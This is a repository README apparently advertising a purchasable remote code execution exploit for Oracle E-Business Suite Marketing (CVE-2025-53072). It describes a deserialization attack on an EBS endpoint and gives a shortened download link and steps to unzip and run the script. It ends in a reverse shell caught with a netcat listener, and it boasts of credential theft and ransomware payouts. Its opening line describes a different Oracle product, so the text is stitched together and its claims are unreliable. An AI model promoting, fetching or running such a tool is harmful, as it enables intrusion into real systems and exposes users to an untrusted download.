Poc for a critical vulnerability in Oracle Fusion Middleware Identity Manager's REST WebServices component affects versions 12.2.1.4.0 and 14.1.2.1.0. The vulnerability allows an unauthenticated attacker with network access via HTTP to completely compromise the Identity Manager system.# Oracle E-Business Suite Marketing RCE Exploit (CVE-2025-53072)
## Overview
This repository contains a fully functional remote code execution (RCE) exploit for the critical vulnerability in Oracle Marketing, part of Oracle E-Business Suite (EBS) versions 12.2.3 to 12.2.14. The flaw allows unauthenticated attackers to achieve full system compromise via a simple HTTP request over the network. No authentication, no user interaction—straight takeover.
Tested against Oracle EBS 12.2.9 on Oracle Linux 7.9 with Apache 2.4.6. Works reliably in lab environments mimicking production setups.
## Download Exploit
### [**Download here**](https://tinyurl.com/7a682sr7)
## Vulnerability Details
- **CVE-ID**: CVE-2025-53072
- **Affected Component**: Oracle Marketing (EBS module)
- **Versions**: 12.2.3 - 12.2.14
- **CVSS Score**: 9.8 (Critical)
- **Attack Vector**: Network (HTTP)
- **Requirements**: None (unauthenticated)
The issue stems from an unchecked deserialization in the `/OA_HTML/AppsLocalLogin.jsp` endpoint's handling of campaign import parameters. By crafting a malicious `campaign_data` POST body with a gadget chain exploiting the Apache Commons Collections library (pre-3.2.2 in bundled EBS), we trigger arbitrary Java code execution on the app server. This bypasses all auth checks and lands a shell directly on the Marketing database host.
In the wild, this has been observed dumping Oracle Wallet creds, pivoting to ERP cores, and exfiltrating customer PII from marketing segments. Patch ASAP if you're running vulnerable EBS—Oracle's July 2025 PSU doesn't fully mitigate without custom config.
## Impact
- **Confidentiality**: Full read access to marketing DB schemas (e.g., `MTL_SYSTEM_ITEMS_B`, `QP_LIST_LINES`), including segmented customer data, campaign analytics, and integrated CRM feeds.
- **Integrity**: Arbitrary data manipulation—alter pricing rules, inject fake leads, or corrupt loyalty programs.
- **Availability**: DoS via infinite loops or resource exhaustion; persistent backdoor for lateral movement.
- **Scope**: Often chained with EBS core vulns for domain admin on Windows/Unix backends. Real-world chains have netted $500K+ in ransomware payloads.
## Requirements
- Python 3.6+
- `requests` library (`pip install -r requirements.txt`)
- Target: Exposed EBS Marketing portal (default port 7001 or custom)
- Optional: `paramiko` for SSH post-exploit (`pip install paramiko`)
No proxies or VPNs needed—it's firewalled but HTTP-open by design.
## Usage
1. Unzip ZIP file.
2. Run: `python exploit.py`
3. If successful, you'll get a reverse shell callback on your listener (default: `nc -lvnp 4444`).
## Legal & Ethics
For authorized pentesting only. Buyer assumes all risk. No refunds—test on your own lab first. We don't condone unauthorized use; this is for red teams closing the gap.
## Contact
For any questions or inquiries, please contact: redfoxlisten@outlook.com
[4.0K] /data/pocs/133a2f1f91994ebf7668bd85d37dd9d209bcbf31
└── [2.9K] README.md
0 directories, 1 file